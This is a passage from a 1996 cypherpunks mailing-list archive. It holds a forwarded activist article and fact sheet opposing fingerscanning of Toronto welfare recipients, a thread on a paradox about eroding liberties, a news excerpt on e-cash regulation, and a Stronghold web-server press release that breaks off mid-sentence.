Subject: Dimitri Spams
In-Reply-To: <VBZJuD10w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960920144709.1223C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri, get a life!  We need Dimitri Spams as much as we needed 
Perrygrams.  Which is to say, we need them not at all!

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 21 Sep 1996 07:36:47 +0800
To: cypherpunks@toad.com
Subject: RRE: fingerscanning
Message-ID: <01I9PFEM77JC8Y50ND@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 19-SEP-1996 22:33:45.99
To:	IN%"rre@weber.ucsd.edu"
CC:	
Subj:	fingerscanning

X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1308

[For those of you who are just joining us, RRE has been following a
controversy in Ontario about the use of biometric encryption to identify
welfare applicants in Toronto for purposes of fraud prevention.  Critics
assert that welfare applicants are being criminalized under the cover of
combatting a fraud problem that doesn't really exist; supporters assert
that the new scheme would be less cumbersome for everyone involved than
the existing identification methods, and that, unlike most biometric
identification schemes, this encrypted scheme does not require the
applicant's fingerprint to be captured in a form that could be used for
law enforcement or other purposes.  The case is important because biometric
encryption is a leading example of the "privacy-enhancing technologies"
that will become increasingly important as a technical means to reconcile
functionality and privacy in technical systems.  I honestly do not know
which side is right, and I have friends among both supporters and critics
of such systems.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 16 Sep 1996 23:49:23 -0400 (EDT)
From: Sarah Vance <svance@uoguelph.ca>
Subject: fingerscanning article

this an article about fingerscanning that I wrote for University of 
Guelph's student newspaper, the "Ontarion", with lots of help from Orenda 
Davis and Jennifer Kohm.  It's not as comprehensive as the info doc, but 
maybe a tad more readable. sooooo please. forward. reprint. etc.

Solidarity,
Sarah
______

A new threat to the privacy and autonomy of all Canadians received 
government's stamp of approval over the summer when Metro Toronto Council 
approved a plan to fingerscan area welfare recipients. Politicians claim that 
this will cut costs by reducing welfare fraud, which is estimated at under 3% 
of Social Service expenditures. Social Justice advocates question the fairness
and fiscal responsibility of paying a consortium led by three large 
corporations, the Royal Bank, Great West Life Assurance Co., and Unisys Canada,
millions of dollars to develop the program when welfare fraud is such an 
insignificant problem. The decision seems particularly questionable since 
New Zealand recently abandoned a similar system, having found that its costs 
far outweighed its benefits.

A key reason for implementing the program, explains Metro's Human Services 
Committee report, is to make municipal Social Services compatible with 
provincial government plans to use biometric identification to "cover a range 
of programs". In Spain biometrics have been used for Unemployment benefits, 
and in the United States a bill was recently discussed that would have used it 
for a host of programs, including health care and immigration. Technology 
companies, such as Mytec, are promoting fingerscanning for these services in 
Canada as well.

Fingerscanning is often confused with fingerprinting, although there are 
substantial differences. In fingerscanning, a machine takes your fingerprint 
pattern and converts it into a unique set of numbers and letters. A central 
computer database holds these codes, which can be accessed by authorized 
groups. For Metro's plan, the system would be designed to catch people trying 
to receive extra benefits by applying for welfare under different aliases. 

The proposition raises the specter of corporate control over the welfare 
system by threatening to bring in private sponsorship. Metro Committee 
documents emphasize "the further exploration of the feasibility of C.I.B.S. 
[the fingerscanning plan] applications to other corporate initiatives." 
The Committee's suggestions for the future of the welfare system include 
"obtaining credits for our customers from various suppliers - supermarket 
chains, drug chains, educational institutions, dental clinics, property
 management companies, clothing stores.." Although this may sound fairly 
innocuous, it erodes the privacy and freedom of choice of people struggling 
below the poverty line.

Presently, program benefits like dental care only cover certain services, and 
are available to limited cash amounts. The Committee's report suggests that 
corporate credits, such as those from grocery or clothing stores, would be 
handled in the same way: the government would control both the type of goods 
individuals purchase and the amount they spend on food, education, and other 
necessities. It makes it possible for politicians to decide things like 
whether or not it is acceptable for poor people to buy cigarettes or junk food.
It is not inconceivable that in the future this power could deny low income 
people freedom over choices as personal as buying birth control.

 As well, those reliant on benefits would have to buy from corporate sponsors. 
It would be irrelevant if their prices were relatively expensive, their 
location inconvenient, or their policies in conflict with an individual's 
cultural or political values. Currently, the government records the location, 
time, and details of dental benefit transactions. It is likely that credits 
from drug stores and other corporate sponsors would be monitored in the same 
way. 

In spite of this, Metro Councilors are so enamored with the fingerscanning 
proposal that they are prepared to recommend it for nationwide use. Toronto's 
Department of Social Services even hopes to make some revenue off its 
expansion by selling the scheme to other jurisdictions.

The spread of biometric identification happened similarly in the United States.
In recent years, its use on welfare recipients has become increasingly 
prevalent. As the idea of biometrically identifying the public has become more 
socially accepted, federal politicians have started considering its usefulness 
for a myriad of services and personal information. In February, Congress 
discussed a bill that would have used fingerscanning to develop a centralized 
database containing personal information on every adult in the country. This 
data was to be made available to a variety of government and corporate 
interests. Even those claiming to be potential employers would have had access 
to an individual's immigration, welfare, and health records. In Toronto, 
assistance recipients can be seen as the test case for widespread use of 
fingerscanning in Canada--the beginning of a slippery slope. 

The Royal Bank's involvement in fingerscanning Metro welfare recipients is 
particularly problematic. If the plan is implemented, all 31 200 of Toronto 
assistance recipients who do not currently have bank accounts will be forced 
to access their benefits from an account set up for Social Services by the 
Royal Bank. The only way they will be able to do this will be through bank 
machines: The Royal Bank is not interested in investing the time and resources 
necessary to personally service these "clients". Instead, they have agreed to 
provide a training session in which these people will be shown how to use bank 
machines. However, unless this session 1) trains people not to have mental 
illness 2) dismantles the cultural barriers to using bank machines and 
3) teaches people to read and write English or French, many of these 31 200 
people and their families will have great difficulty accessing their 
assistance funds.

There is also a question of who will pay for Royal Bank user fees. Brett 
Fleming, a Bank executive involved in the negotiations, has stated that "we'll 
all have to bear some of the pain". They have kindly offered to forfeit the 
profits for at least two user charges per month. Fleming claims that Metro 
Social Services will likely cover 5 more Interac charges per month for each of 
these recipients.  At current rates, this would cost taxpayers $2 340 000 a 
year... Fortunately for Brett, it seems that the Royal Bank's "pain" will be 
minimal.

Activists in the United States, are finding it difficult to eliminate the 
practice of fingerscanning, as it has quickly become entrenched in American 
public policy. In Canada, biometric identification is new enough that it can 
be challenged more easily. Legal and social justice groups are already mounting
campaigns to put an end to Metro's plans before the deal is finalized. A group 
based in Guelph has formed with the goal of forcing the Royal Bank to withdraw 
from the consortium, making it difficult for the program to proceed. The 
campaign's strategy is to use a boycott to draw negative attention to the Royal
Bank, forcing them to question whether they are willing to risk their 
reputation for the fingerscanning plan. The campaign is urging people 
across the province to withdraw their student loans, accounts, and RRSPs from 
the Bank. If you are interested in getting more information on Metro's 
fingerscanning plans, or in joining the fight against it, contact Orenda Davis 
@ (519)763-5292 <odavis@uoguelph.ca>, or Sarah Vance @ (519)763-6726 
<svance@uoguelph.ca>.

____________________________________________________________________________
FIGHT FINGERSCANNING!  (it IS possible)

Join the province-wide campaign against fingerscanning, based right here in
Guelph Make funds and support available for people on welfare who risk not to
be scanned Donate resources.... photocopying, faxing, use of phones, artistic
talent, your TIME, your skills BOYCOTT THE ROYAL BANK.  Put pressure on them
to withdraw from the consortium.  People have already pulled their student
loans, accounts, and RRSPs from the Bank

Contact: Orenda Davis (519)763-5292 <odavis@uoguelph.ca>, or Sarah Vance
(519)763-6726 <svance@uoguelph.ca>.

Date: Mon, 16 Sep 1996 23:22:19 -0400 (EDT)
From: Sarah Vance <svance@uoguelph.ca>
Subject: at last... the fingerscanning info doc. (fwd)

[...]

METRO TORONTO AND THE FINGERSCANNING SCHEME:
SOME OF THE FACTS THEY AREN'T TELLING US

For the last few years some of the people from Metro social services have been
working with large corporations to develop a program for fingerscanning people
on welfare.  On June 19, 1996 Metro Toronto Council passed a decision 
recommending that this program be implemented as soon as possible, probably
starting at the beginning of 1997.  The program is complicated, and full 
of very serious problems that have not been discussed in the mainstream media.
Soooo... I've tried to use plain english to explain what's going on, and how 
fingerscanning will effect people on welfare, and society in general if it is 
implemented.  If parts of this "report" aren't clear, or if it is missing any 
important info please contact me (sarah) so I can revise it. (my number and 
email are listed at the end)   

PART I:  	THE BASICS... WHAT IS IT AND HOW WOULD IT WORK?

What is biometric identification?
-the use of someone's body to identify them, whether it's by fingerscanning, 
retinal scans etc..

What happens to someone when they get fingerscanned?
-when you apply for welfare you would put a couple of your fingers into the 
scanning machine.  That machine takes your fingerprint pattern and converts 
into a unique set of numbers and letters, a "bioscrypt".  It's kind of like 
having your fingerprint turned into a bar code that is held in the computer's 
database. 

Who has access to the fingerscans?
The bar code is, at least according to the information I've been able to find,
accessible to anyone.  It is just stored in the computer, so that the computer 
won't accept your fingerprint (or bar code) if you try to apply for welfare 
again.  Metro council is recommending that the bar codes be destroyed three 
months after someone goes off of social assistance.  According to them, the 
only person who could access these numbers would be the person responsible for 
maintaining the system.  This person only accesses the system periodically to 
make sure that bioscrypts have been destroyed at the appropriate time.

How often will people on welfare have to be fingerscanned?
-although Metro officials say that people will only be fingerscanned when they 
register for welfare, Metro Committee documents imply that biometric id will 
be used more often than that...

Human Services Committee Report #8, pg.11, (A) improving customer 
identification says.."CIBS will address...ongoing confirmation of identity" 
(I underlined that)
"Biometric technologies give customers a fast, non-intrusive and very reliable
way to provide indisputable proof of identity - even if they have no other 
identification." but, since other id like a driver's licence etc.. will still 
have to be used for enrollment, the only way this statement can be true is if 
Metro is planning on fingerscanning people on welfare at other times as well.  
("CIBS" is what they're calling the program, it stands for "Client 
Identification and Benefit System")


Who is getting paid to develop this program?
-the Royal Bank, Great West Life Assurance, and Unisys Canada are heading the 
group (or "consortium") that has won this contract

What is the Royal Bank's role in fingerscanning?
-they are providing a Metro Social Services Royal Bank account that anyone on 
welfare who doesn't currently have a bank account will get their money from

What is Great West Life Assurance's role?
-they are developing a benefits card that welfare recipients will use at the 
dentist's etc.  instead of vouchers

What is Unisys' role?
-right now Unisys wants to provide the computer administrative backup for the 
program.  They also have biometric identification technology which they hope 
to sell to Metro social services.

Who is providing the biometric technology for this project?
-they haven't finalized which particular type of biometric id they will use 
yet (it will almost certainly be fingerscanning) once they do decide, THEN they
will start negotiating contracts with people that sell the technology...among 
these corporations are Unisys Canada and Mytec.

How would the system change the way people get access to their money?
-people who already have bank accounts will get their money direct deposited 
into their accounts (for many the way they access their money won't change)
-people who don't have bank accounts get Royal Bank cards that they'll take to 
Royal Bank machines to withdraw their money.  As of yet, there are no 
provisions for people to get their money any way other than by using a Royal 
Bank machine--they won't be allowed to go to tellers to take out their money.  
No one is sure about what provisions will be made for bank user fees--i.e. 
Interac charges.

Where else is this happening?
-In several places across the US (eg. Los Angeles and Alameda Counties, in 
California, Ohio etc..)  
-In Spain fingerscanning is being used on the unemployed

How soon is Metro Toronto hoping to implement it?
-They hope to finish their negotiations and start implementing fingerscanning 
as early as January of 1997.

Would fingerscanning be mandatory?
-no. at first it would only be coerced (see the section on risks of refusal, 
under part 7).  But Metro council recommended making it mandatory in the 
future.  Right now their lawyers are advising them that they will run into 
serious human rights battles if they try to make fingerscanning mandatory 
right away.

PART 2: 	SPEAKING THEIR LANGUAGE...THE MONEY ARGUMENT

How much fraud is there in the welfare system??
-between 0.5% and 3% of welfare cases are fraudulent 
(ie "double-dippers --meaning that they are receiving cheques from more than 
one office).  This figure has been confirmed by Liberal and NDP studies, 
it and includes administrative errors.
-one Metro councillor has stated that fraud is actually no more than 0.5%
-of the 10 000 calls received by Metro's fraud line, only 0.7% were confirmed 
as double-dippers (globe, June 20) most of the people that were reported 
weren't even on welfare
-when discussing the amount of fraud in the welfare system it is essential to 
ask why people on social assistance commit fraud.  This requires ackowledging 
that in 1993 (before the 21.6% cut to assistance cheques) maximum welfare 
payments were still well below Stats Canada's poverty line

How much of taxpayer's money will it cost to install the system?
-$4-8 million to install for Metro (globe and mail, june 20)
-the cost is of installation is still being negotiated
-as far as I know, no one involved in the planning of the project has released 
estimates of the cost of training social service workers to use the system, of 
changing the computer filing system, of maintaining the new system etc... but 
these costs are sure to be substantial

Will taxpayer's money be used to pay for the royal bank for user fees so that 
social assistance recipients can get bank accounts (even though that's not what
many of them want)?
 yep.

If people get bank accounts, won't they get service charges as well?
-"We'll all have to bear some of the pain", says Bank executive Brett Fleming. 
He claims that the Royal Bank will probably pay for at least two uses of 
Interac per month per recipient, and that social services will probably pay 
for 5 more.

So... if, as Brett Fleming estimates, Metro pays for recipients to get 5 free uses of Interac per month, how much will that cost?
-there are 104 000 social assistance cases in Metro, 30% of them don't presently have bank accounts and therefore will have pseudo accounts set up at the Royal. That means that 31 200 new accounts will be set up at the royal for welfare recipients. 

FOR ONE MONTH
  		31 200    accounts
 	       x $6.25    5 interac charges @ $1.25/each	
                          
	   $195 000 per month in cost to taxpayers -> additional Bank profit
          
FOR ONE YEAR
		$195 000   /month
		x      12   months

            $2 340 000 per year in cost to taxpayers--> additional Bank profit

FOR FIVE YEARS
                         $2 340 000   /year
		      x           5    years

 $11 700 000 in five years in cost to taxpayers-->additional Bank profit***

***note: this calculation is made under the assumption that Interac charges 
will not increase in the next five years, and that welfare rolls will remain 
the same size

But can't these costs be avoided by encouraging assistance recipients to use 
Royal Bank branches rather than bank machines?
no.  
Assistance recipients who are provided with pseudo Royal Bank accounts will not
be allowed to use bank branches, they will only be allowed to use bank machines.

What is vendor fraud and will the system help to decrease it?
-vendor fraud is fraud committed by professionals who provide government paid 
benefits to people on welfare (eg. dentists).  Although the Royal Bank has 
stated that the thrust of the whole program is to decrease vendor fraud little 
proof has been provided so far that this will actually happen.
-they argue that the paper vouchers that used to be used by welfare recipients 
to pay for dental repairs, for instance, can fairly easily be reproduced making
it easy for vendors to charge the government for more services than they 
actually provide.  These paper vouchers are to be replaced by electronic cards 
so that the problem of duplication will be eliminated.  It is possible that 
the benefit card could deter vendor fraud to some extent;  However vendor 
fraud can easily occur in other ways (eg. By overcharging for services, or by 
charging for services that aren't neccessary....  
-Also, and most importantly, detering vendor fraud has nothing to do with 
biometrically identifying welfare recipients.  If Metro Toronto wishes to use 
the benefit card to deter fraud (although the merits of this system are 
dubious) this could more inexpensively be done, and more sensibly be done, 
with out being attached to biometrical identification of the poor.

Will fingerscanning save money in the longrun?
-This is questionable:  New Zealand instituted this system, but ended up 
abandoning it because its costs of implementation and maintenance far 
outweighed the amount saved from reduced fraud.

PART 3:  	STIGMATIZATION

-Metro argues that they aim to decrease stigmatization of welfare recipients 
by replacing cheques with bank cards, but at the same time they are thinking 
about using this system to start forcing poor people to use welfare benefit 
cards instead of cash for food, clothing, tuition and other basic needs.

How does this criminalize welfare recipients?
-some people argue that the only reason fingerscanning is seen as criminalizing
is because it is confused with fingerprinting.  It is true that fingerscanning
technology is quite different from actual fingerprinting, but this does not 
erase the common element shared by both techniques:  When a person is 
fingerprinted by the police it is because they are suspected of a crime, they 
are considered suspicious and are therefore scrutinized.  When a person is 
fingerscanned for welfare it is also because they are suspected of a crime.  
The crime is fraud, and by virtue of being poor and dependant on state funds 
you are automatically considered suspicious and therefore scrutinized.
-by spending millions on this system the government is helping to perpetuate 
the myth that our economic problems are caused by the poor. 

PART 4: 	ISSUES OF ACCESS 

Will fingerscanning make it easier for people who don't have "proper" 
identification to register for benefits?
-NO.  Even though this argument is often put forward, you will still have to 
have exactly the same types of identification to apply for welfare.  
Metro Human Services Committee report reads, 
"Conventional forms of identification (e.g. driver's licence, 
birth certificate) will continue to be required to establish initial 
eligibility for social assistance." 
(p.11, (A) Improving Customer Identification)

If welfare recipients are only allowed to withdraw money from bank machines, 
how will people who have mental illnesses; do not read english or french; or  
have cultural or personal reasons for not using bank machines;  be able to get 
their money?
-the Royal Bank says that they will provide one training session in which 
people will be shown how to use bank machines.  However, unless this session 
1) trains people not to have mental illness 2) dismantles the cultural barriers
to using bank machines and 3) teaches people to read and write english or 
french, many of the 31 200 people and their families who don't currently have 
bank accounts will not have access to their assistance funds.


PART 5:  	ISSUES OF CORPORATE AND GOVERNMENT CONTROL

How could the project bring more corporate control to the welfare system?
-The idea of bringing in corporate sponsorship is brought up again and again 
in Metro Committee documents...
pg.3, recommendation #2
that "the Corporate Administration Committee approve the continued 
participation of Metro Corporate and Human Resources in the systems and 
financial development of C.I.B.S. and the further exploration of the 
feasibility of C.I.B.S. applications to other corporate initiatives"

the future of the welfare system???
pg.15, (B) (II)
"the delivery foundation established by CIBS will give the Division 
unprecedented flexibility in the administration of program benefits.  One 
advantage could be to use this flexibility to optimize customer purchasing 
power by obtaining credits for our customers from various suppliers - 
supermarket chains, drug chains, educational institutions, dental clinics, 
property management companies, clothing stores."
-This statement very strongly urges corporate sponsorship.   Right now program 
benefits like dental care only cover certain services (eg fillings), and are 
only available to certain cash amounts.  The insinuation is that any corporate 
benefit credits from grocery stores, clothing stores,etc. would be 
handled in the same way.  ie. you would only be able to spend a certain amount 
on food, clothing, education etc. You would only be able to buy certain items, 
you would only be able to live in certain places. 
It makes it possible for the government to do things like make it impossible 
for you to buy cigarettes and junk food with your food credit.  It makes it 
possible for governements of the future to control whether or not you are 
allowed to buy birth control and what typesof birth control you are 
allowed to buy.   Whatever companies sponsored the program would be the only 
ones that you could buy from, even if their prices are higher than other 
stores, even if they aren't located near your home, even if you have 
cultural/personal/political reasons for not wanting to shop at these large 
corporations. It means that poor people would no longer be entitled to basic 
freedoms of choice. And like with dental benefits now, the location, time and 
details of your purchases would be recorded. The kind of underwear you buy, 
what you buy at the grocery store, what type of drugs you purchase, would all 
be recorded by the government.  It opens the door for a frightening amount of 
government and corporate control and surveillance.

PART 6:	A SYSTEM DESIGNED FOR EXPANSION--
WELFARE RECIPIENTS AS GUINEA PIGS.

Could fingerscanning of welfare recipients expand beyond Metro Toronto in the 
future?
-yes, Metro council recommended that they consider making it nationwide in the 
future.
"By working with its private sector partners to build an integrated customer 
identification and disbursement system that meets the operational and business 
needs of a large income support program, Metro will gain valuable experience 
and expertise that can be applied to other jurisdictions." (pg.7 (II) )
-they are also talking about selling this program to other areas, pg.7, (II)
"There is also the potential for future revenues related to the sale of 
specific applications developed for Metro to other jurisdictions.  There is 
clear interest in the approach the Division is taking, and the results that 
will be achieved.

Could fingerscanning be used for other government programs?
-Metro Human Services Committee report (#8) explains that, 
"recently, the Provincial government has announced it is assessing the 
development of an identification card that could cover a range of programs....
C.I.B.S. employs technologies that will very likely be compatible, and can be 
incorporated, with prospective provincial applications." (p.7, comments 
and discussion Part I (c).  The report goes on to clearly explain that one of 
the reasons for developing biometric id for welfare recipients is because they 
want to be prepared for when the province starts using fingerscanning for 
other areas.
-Mytec, one of the companies competing to supply the biometric technology also 
hopes to apply it to (among other things) Canadian immigration and healthcare.
-The spread of biometric identification has worked similarly in the US...It's 
use on welfare recipients has gradually become more and more widespread.  The 
acceptance of its use for this purpose has made it possible for the country to 
move in the direction of  using biometric id for a wide variety of services.  
In Febuary, Congress discussed a bill that called for fingerscanning every 
resident of the US over the age of 16 in order to develop a centralized 
database of information that would have been made available to a wide variety 
of government and corporate interests, including anyone who claims to be a 
potential employer.  Now that fingerscanning for government services has become
entrenched in the United States it is extremely difficult for people to 
fight against its use.  People on welfare in Toronto can be seen as the test 
case for widespread use of fingerscanning in Canada, the beginning of a 
slippery slope.


PART 7: FIGHTING BACK

Legal Battles
-Several groups in Toronto are confronting this issue as a human rights 
violation.  Their strategy is to use the courts in order to have 
fingerscanning struck down. 

What can people on welfare do to fight against this?
-Gather and publicize information about this issue (eg. through leafletting, 
press releases, demonstrations, stickering, civil disobedience, street 
theatre...) 
-Join the Toronto coalition being formed by the Toronto-based group 
"Low Income Families Together"
-Speak to one of the legal groups interested in pursuing fingerscanning as a 
human rights issue (contact Elinor Mahoney at Parkdale Legal Services, for 
instance)
-Refuse to be fingerscanned.  (So far you are legally entitled to do this, 
however there are risks involved that you may or may not be able to take).  
Some of these risks are.... Getting your cheque later than otherwise,
(which could make it difficult to pay bills on time), being treated as 
suspicious by social service workers, being harrassed

What can anyone do if they're concerned about fingerscanning?
-Make funds and support available for people on welfare who choose not to be 
scanned
-Join the Toronto Coalition against fingerscanning being formed by Low Income 
Families Together
-Join the province-wide campaign against fingerscanning by talking with any of 
the contacts listed below
-Gather and publicize info about this issue (eg through leafletting, 
demonstrations, press releases, stickering, civil disobedience, 
street theatre...) *the campaign against fingerscanning can provide you with 
leaflets, posters, info, contacts in your area...
-voice your concerns LOUDLY to Metro Council
-Donate resources.... photocopying, faxing, use of phones, artistic talent, 
your TIME, your skills (eg. with dealing with media, with strategizing, with 
caring for children so people who often don't get a chance to participate in 
political activities can get involved..), your computer, your legal 
advice/representation....
-Boycott the Royal Bank to put pressure on them to withdraw from the 
consortium (this is the thrust of the Campaign against Fingerscanning's 
strategy...people have already withdrawn their student loans, accounts, and 
RRSPs from the Bank)

Who can I get more information from?
Contact....
Guelph:  	Orenda Davis (519)763-5292, or Sarah Vance (519)763-6726
Toronto:  	Kirsten at Low Income Families Together (416)597-9400 
                        or fax: (416)597-2128
		

or email <odavis@uoguelph.ca> or <svance@uoguelph.ca>
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 21 Sep 1996 07:41:31 +0800
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: Paradox: NO OPPRESSION IN AMERICA
In-Reply-To: <Pine.3.89.9609201518.A433-0100000@skypoint-gw.globelle.com>
Message-ID: <9609202023.AA01121@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Renner writes:
>  Those of you who took Logic 1001 will recall the paradox known
>  as "The Heap" which goes like this:

Hey, a liberty here, some freedom there, and pretty soon you're talking  
about real totalitarianism!


andrew
"It could never happen here."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Sat, 21 Sep 1996 05:07:17 +0800
To: cypherpunks@toad.com
Subject: Paradox: NO OPPRESSION IN AMERICA
Message-ID: <Pine.3.89.9609201518.A433-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Those of you who took Logic 1001 will recall the paradox known as 
"The Heap" which goes like this:

1. A single grain of sand does not constitute a heap of sand.
2. You can create a heap from a non-heap by adding a single grain of sand.
3. Therefore, there is *NO SUCH THING* as a heap of sand.

You with me here?  Okay, this is important, because the public actually does 
think like this:

1. Our current society in America is not oppressive. (generally accepted)

2. You cannot change a non-oppressive society into an oppressive society
   by removing one liberty from its citizens.   (also generally accepted)

3. Therefore, it is not possible for America to become an oppressive society.


Sleep well,
Douglas B. Renner





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 21 Sep 1996 02:59:02 +0800
To: cypherpunks@toad.com
Subject: Free E-Cash
Message-ID: <199609201551.PAA22207@pipe4.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ, September 20, 1996, p. A16. 
 
 
   Fed Chief to U.S: Back Off On Electronic-Cash Rules 
 
 
   Washington -- Regulators should stay out of the way and let 
   the market for electronic money develop without government 
   meddling, said Alan Greenspan, chairman of the Federal 
   Reserve Board. 
 
   "The private sector will need the freedom to experiment 
   without broad interference from the government," he told a 
   government conference on electronic cash yesterday. Too 
   much interference could impede innovation, he said. 
 
   Bank debit cards, along with other forms of electronic 
   payments, "account for a very small percentage of 
   transactions," he said. "Even the use of popular credit 
   cards has only recently begun to challenge paper's 
   dominance." 
 
   [End] 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@veriweb.com>
Date: Sat, 21 Sep 1996 09:39:58 +0800
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: Paradox: NO OPPRESSION IN AMERICA
In-Reply-To: <Pine.3.89.9609202137.B939-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.BSI.3.93.960920161727.14954A-100000@descartes.veriweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Sep 1996, Douglas B. Renner wrote:

> 
> 
> On Fri, 20 Sep 1996, Jeremey Barrett wrote:
> > 
> > Rubbish. If the government removes all liberties at once, that's 
> 
> 
> If I went over your head, I apologize!
> The point of a paradox such as this is to illustrate something which is 
> OBVIOUSLY FALLACIOUS, so that we might learn from it.  The intention is 
> to make us *think*.

I have seen many a post more foolish that was intended in all seriousness.
My point is that neither your first nor second arguments are a paradox, 
nor do they relate to one another. I agree that many people may not
see their freedoms being whittled away, simply because they are being
whittled away, as opposed to eliminated all at once. If that is your
point however, it was unclear. Apologies if you were upset by my response.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jeremey Barrett
Senior Software Engineer                         jeremey@veriweb.com
VeriWeb Internet Corp.                           http://www.veriweb.com/

PGP Key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64
PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkMoUy/fy+vkqMxNAQFQIQP/UNUTD+MtbSpYZhLNNGcUXqzgRcA//8EO
7SJknZWlm2vHtd5siVOd847H9g+hJ5K9CdrzxgQgCUz4LT8FwZ5peLmM+gDvONGx
XIZl3CSMlSv90msR50h8f1glMUiRJa2Q7vbIcj46GEwZx3U67bJe+MSdMcHumK8U
/RPKQ96qkdQ=
=u4aS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sat, 21 Sep 1996 09:45:17 +0800
To: cypherpunks@toad.com
Subject: C2NET AND UK WEB OFFER UNCRIPPLED SECURITY SOFTWARE TO WEB USERS IN ALL COUNTRIES
Message-ID: <199609202332.QAA13460@lachesis.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



For Release Sept. 20, 1996
C2Net: Sandy Sandfort 
+1 510-986-8770
UK Web: Dave Williams 
+44 0113 222 0046

C2NET AND UK WEB OFFER UNCRIPPLED SECURITY
SOFTWARE TO WEB USERS IN ALL COUNTRIES 

LEEDS - Today, UK Web Ltd. and C2Net (Community ConneXion, Inc.) 
announced the worldwide availability of Stronghold security 
software for the World Wide Web. Stronghold is a commercial 
version of Apache, a powerful and popular server software package 
for the Internet.  Stronghold uses "Secure Sockets Layer" (SSL), 
a cryptographically strong protocol to protect credit card 
numbers and other sensitive information from Internet 
eavesdroppers. Stronghold also comes with a full range of 
"certificate authority" tools, documentation, easy installation, 
and technical support.

Export versions of other Web servers, such as the Netscape 
Enterprise and Microsoft Internet Information Server have 
intentionally crippled encryption security. Stronghold uses 
uncompromised strong encryption world-wide. This is possible 
because it was written using software developed outside the US. 
Stronghold uses the full power of 128-bit symmetric encryption 
for maximum security. (Competing servers exported from the US use 
only 40-bit, low-level security). Stronghold is fully compatible 
with all secure browsers, including Netscape Navigator and 
Microsoft and Internet Explorer.

"Stronghold is based on the most powerful Web server and the most 
secure Internet encryption," says Mark Cox, Stronghold product 
manager.  "Users of Stronghold can be sure that their commercial 
transactions are completely private and secure."

Dave Williams, Managing Director of UK Web, adds "Stronghold has 
already proved very popular in the US and Canada, where it has 
been available nearly a year. UK Web will now be selling 
Stronghold exclusively outside the US and Canada, giving the rest 
of the world the first opportunity to buy this top-rated product. 
We think it will be very popular."

UK Web is a leading authority on the Apache web server. They are 
committed to information-sharing and openness. They also offers 
commercial support for Apache. UK Web publishes a weekly 
newsletter called "Apache Week" which is available free of charge 
on the Internet.  The Apache Week Web site can be found at 
http://www.apacheweek.com/.

"In the past year the demand for an international version of 
Stronghold has been steadily increasing," said Sameer Parekh, 
President of C2Net, "but we've never been willing to give our 
customers a false sense of security by shipping a defective 
product. We're very glad UK Web can satisfy the need for an 
international version of Stronghold."" International Stronghold 
costs 329 pounds, which includes free minor upgrades. It is free for 
non-commercial use by educational and not-for-profit 
organisations. Full server source code is provided as well as the 
pre-compiled server. It is available the most commonly used Unix 
platforms, including Linux, SunOS 4, Solaris 2, IRIX and AIX. The 
server is based on the popular Apache module API, which gives 
access to a wide range of third-party server add-on "modules", 
most available for free. Within the United States and Canada 
Stronghold is available from C2Net. (See 
http://stronghold.c2.net/)

Full details of International Stronghold are available on the UK 
Web's web site, at http://stronghold.ukweb.com/. The software is 
available for free download and evaluation.

UK Web Limited is a leading Internet services company 
specialising in server technology, Internet security, business 
solutions and effective site design.

C2Net (also known as Community ConneXion, Inc.) is the leading 
provider of uncompromising security on the Internet. C2Net 
